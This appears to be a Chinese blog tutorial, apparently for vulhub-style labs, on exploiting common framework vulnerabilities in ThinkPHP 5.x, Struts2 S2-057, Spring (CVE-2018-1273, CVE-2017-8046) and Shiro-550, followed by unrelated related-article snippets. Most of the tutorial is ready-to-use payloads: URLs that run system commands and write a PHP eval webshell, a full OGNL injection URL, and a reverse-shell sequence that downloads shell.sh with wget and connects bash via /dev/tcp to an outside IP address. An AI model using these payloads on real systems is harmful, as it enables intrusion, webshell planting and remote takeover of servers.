常见的框架漏洞

ops/2024/10/21 10:12:10/

Thinkphp5x远程命令执行及getshell

远程命令执行

打开环境,拼接以下目录,执行系统命令

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

远程代码执行

打开环境,拼接以下目录,执行代码命令

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

getshell

打开环境,拼接以下目录,植入木马,获取 shell

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]); ?> " >>121.php

struts2

S2-057远程执行代码漏洞

1.打开环境,访问漏洞地址

/struts2-showcase

2.在 URL 处拼接以下代码,访问后发现中间数字相加,证明中间可执行代码

${(123+123)}/actionChain1.action

3.将以下代码替换,获取 whoami

/struts2-showcase/$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action

Spring

spring 代码执行(CVE-2018-1273)

1.打开环境,访问漏洞网址,注册抓包

/users

2.添加以下 poc ,显示 500 即输入成功

username[#this.getClass().forName("java.lang.Runtime" ).getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=

3.反弹 shell ,先写入 shell.sh ,开启监听,执行 shell.sh ,即可反弹到 shell

/usr/bin/wget -O /tmp/shel.sh http://112.126.80.8:8080/shell.sh
bash -i >& /dev/tcp/112.126.80.8/7777 0>&1
/bin/bash /tmp/shell.sh

Spring Data Rest 远程命令执行命令(CVE-2017-8046)

1.打开环境,拼接以下目录进入漏洞处

/customers/1 

2.抓包,将请求头替换为 PATCH,在数据包末尾空一行输入以下代码

PATCH /customers/1 HTTP/1.1
Host: ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 193[{"op":"replace","path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname","value":"vulhub"}]

Shiro

Shiro rememberMe反序列化漏洞(Shiro-550) CVE-2016-4437

1.打开环境,抓包发送重放器,发送,若在 Cookie 中有 rememberMe=deleteMe 则存在漏洞

2.使用工具 shiro反序列化漏洞综合利用 v2.2 输入目标地址,检测秘钥-->爆破秘钥-->检测当前利用链,若存在利用链,则进入命令执行或内存马区块,反之爆破利用链


http://www.ppmy.cn/ops/91768.html

相关文章

DNS安全概述

一、DNS的解析过程 1.递归解析 递归解析是一种由DNS客户端&#xff08;通常是用户的应用程序&#xff0c;如一个浏览器&#xff09;向本地DNS解析器发出解析请求&#xff0c;然后本地DNS解析器负责查询最终结果并将结果返回给客户端&#xff0c;而中间的所有查询请求都由本地D…

书生大模型实战营-基础关卡-2-8G 显存玩转书生大模型 Demo

Cli Demo 部署 InternLM2-Chat-1.8B 模型 先简单试试 InternLM2-Chat-1.8B 模型的能力 生成 300 字的小故事 我的prompt&#xff1a;写一个300字以内的小故事,故事符合中国特色. 模型输出&#xff1a;故事整体性还是很好的。 在一个小镇上&#xff0c;住着一只名叫小明的猫咪…

河南萌新联赛2024第(四)场:河南理工大学 C 岗位分配 I 马拉松

文章目录 8.7 2024第&#xff08;四&#xff09;场&#xff1a;河南理工大学C 岗位分配思路代码 I 马拉松思路代码 8.7 2024第&#xff08;四&#xff09;场&#xff1a;河南理工大学 [河南萌新联赛2024第&#xff08;四&#xff09;场&#xff1a;河南理工大学 ](河南萌新联赛…

基于Java中的SSM框架实现校园图书在线阅读系统项目【项目源码+论文说明】

基于Java中的SSM框架实现校园图书在线阅读系统演示 摘要 随着计算机的广泛应用和推广&#xff0c;越来越多的传统人工管理模式逐渐被线上化平台系统所替代&#xff0c;高校作为知识的学府在计算机的应用上非常广泛&#xff0c;同时随着近年来高校信息化建设的不断提升&#xf…

360安全大模型为什么是“非卖品”?

大模型虽然不是万能的&#xff0c;但是没有大模型又是万万不能的。以AI大模型为动力引擎&#xff0c;AI正在重塑各行各业&#xff0c;并快速“飞入寻常百姓家”。 AI安全 以“模”制“模” 2024年全国两会&#xff0c;“人工智能”首次被写入政府工作报告。报告中提出&#xff…

【Python网络爬虫案例】python爬虫之爬取豆瓣电影信息

&#x1f517; 运行环境&#xff1a;PYTHON &#x1f6a9; 撰写作者&#xff1a;左手の明天 &#x1f947; 精选专栏&#xff1a;《python》 &#x1f525; 推荐专栏&#xff1a;《算法研究》 #### 防伪水印——左手の明天 #### &#x1f497; 大家好&#x1f917;&#x1f91…

[Vue]Vue3从入门到精通-综合案例分析

一.Vue是什么&#xff1a; 概念&#xff1a;Vue是一个用于构建用户界面的渐进式的框架 以下的内容是自里向外的 声明式渲染(Vuejs核心包)组件系统(Vuejs核心包)客户端路由VueRouter大规模状态管理Vuex构建工具Webpack/Vite Vue的两种使用方式&#xff1a; Vue核心包开发-&…

【前缀异或和】力扣2588. 统计美丽子数组数目

给你一个下标从 0 开始的整数数组nums 。每次操作中&#xff0c;你可以&#xff1a; 选择两个满足 0 < i, j < nums.length 的不同下标 i 和 j 。 选择一个非负整数 k &#xff0c;满足 nums[i] 和 nums[j] 在二进制下的第 k 位&#xff08;下标编号从 0 开始&#xff0…